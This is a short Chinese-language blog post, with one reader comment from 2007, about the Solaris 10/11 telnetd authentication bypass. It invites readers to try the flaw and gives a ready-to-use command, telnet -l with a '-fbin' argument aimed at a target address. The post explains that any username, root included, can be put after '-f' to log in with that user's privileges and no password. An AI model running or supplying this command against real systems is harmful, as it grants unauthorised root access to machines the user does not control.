Solaris 10/11一傻冒漏洞

如果你的Solaris 版本是10/11;

它又开着telneted服务, 呵呵,  也许你愿意试试这样做:

solaris_root1.gifsolaris_root2.gif

基本上你可以在telnet命令的-l选项后指定任何一个”-fusername”参数, fusername可以是任何你需要的用户名, 比如bin, root等. 执行telnet后可以得到fusername指定的用户权限. 比如:

telnet -l “-fbin” target_address

0day_was_the_case_that_they_gave_me.pdf

1 Response to “Solaris 10/11一傻冒漏洞”


  1. 1 miFor Jul 21st, 2007 at 10:52 PM

    So Old~

Leave a Reply